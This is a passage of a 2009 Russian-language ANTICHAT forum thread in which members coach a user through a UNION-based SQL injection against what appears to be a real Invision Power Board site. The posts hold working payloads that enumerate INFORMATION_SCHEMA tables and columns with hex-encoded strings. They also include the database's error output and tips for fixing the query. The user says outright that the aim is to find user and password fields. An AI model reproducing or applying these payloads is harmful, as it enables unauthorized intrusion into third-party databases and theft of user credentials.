HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6461  
Старый 06.04.2009, 18:39
massovka
Познающий
Регистрация: 05.04.2009
Сообщений: 71
Провел на форуме:
299541

Репутация: 5
По умолчанию

+information_schema.tables+limit+14,1--+
 
Ответить с цитированием

  #6462  
Старый 06.04.2009, 18:55
massovka
Познающий
Регистрация: 05.04.2009
Сообщений: 71
Провел на форуме:
299541

Репутация: 5
По умолчанию

вот так листаю все но ничего нет
 
Ответить с цитированием

  #6463  
Старый 06.04.2009, 19:04
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

попробуй например так :

PHP код:
concat(table_schema,0x2E,table_name,0x3D3E,COLUMN_NAME)+from+INFORMATION_SCHEMA.COLUMNS+where+table_schema+not+in+(0x696e666f726d6174696f6e5f736368656d61)+limit+0,1--+ 
 
Ответить с цитированием

  #6464  
Старый 06.04.2009, 19:51
massovka
Познающий
Регистрация: 05.04.2009
Сообщений: 71
Провел на форуме:
299541

Репутация: 5
По умолчанию

index.php?showtopic=-24435+union+select+1,table_name,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28+from+information_schema.tables+limit+14,1--+


Подскажите как подставить concat(table_schema,0x2E,table_name,0x3D3E,COLUMN_ NAME)+from+INFORMATION_SCHEMA.COLUMNS+where+table_ schema+not+in+(0x696e666f726d6174696f6e5f736368656 d61)+limit+0,1--+

в мою линк
 
Ответить с цитированием

  #6465  
Старый 06.04.2009, 19:56
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

вместо table_name засунь это:

concat(table_schema,0x2E,table_name,0x3D3E,COLUMN_ NAME)

вместо information_schema.tables+limit+14,1 засунь это:

INFORMATION_SCHEMA.COLUMNS+where+table_ schema+not+in+(0x696e666f726d6174696f6e5f736368656 d61)+limit+0,1
 
Ответить с цитированием

  #6466  
Старый 06.04.2009, 20:00
massovka
Познающий
Регистрация: 05.04.2009
Сообщений: 71
Провел на форуме:
299541

Репутация: 5
По умолчанию

SELECT * FROM ibf_topics WHERE tid = -24435 union select 1,concat(table_schema,0x2E,table_name,0x3D3E,COLUM N_ NAME),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28 from INFORMATION_SCHEMA.COLUMNS where table_ schema not in (0x696e666f726d6174696f6e5f736368656 d61) limit 0,1 ORDER BY last_post DESC LIMIT 0,1 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'NAME),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28 f' at line 1

вот что пишет
 
Ответить с цитированием

  #6467  
Старый 06.04.2009, 20:03
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

COLUMN_ NAME

Убери форумные пробелы. Видишь же, даже в твоей мессаги появляются пробелы, которых не было вообще-то
 
Ответить с цитированием

  #6468  
Старый 06.04.2009, 20:04
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

massovka
Давай линк, или иди почитай статьи. Какой смысл тупо пихать то , что тебе дали, даже не понимая зачем это?

Ты пробелы не убрал (если тебе это о чём-то говорит)

2 xcedz я тебя вижу, бойся меня

Последний раз редактировалось jokester; 06.04.2009 в 20:07..
 
Ответить с цитированием

  #6469  
Старый 06.04.2009, 20:08
massovka
Познающий
Регистрация: 05.04.2009
Сообщений: 71
Провел на форуме:
299541

Репутация: 5
По умолчанию

я кинул тебе в личку
 
Ответить с цитированием

  #6470  
Старый 06.04.2009, 20:20
massovka
Познающий
Регистрация: 05.04.2009
Сообщений: 71
Провел на форуме:
299541

Репутация: 5
По умолчанию

index.php?showtopic=-24435+union+select+1,table_name,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28+from+information_schema.tables+limit+14,1--+

Вот моя сылка просматрюю все поля ничего про user password ничего нет
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ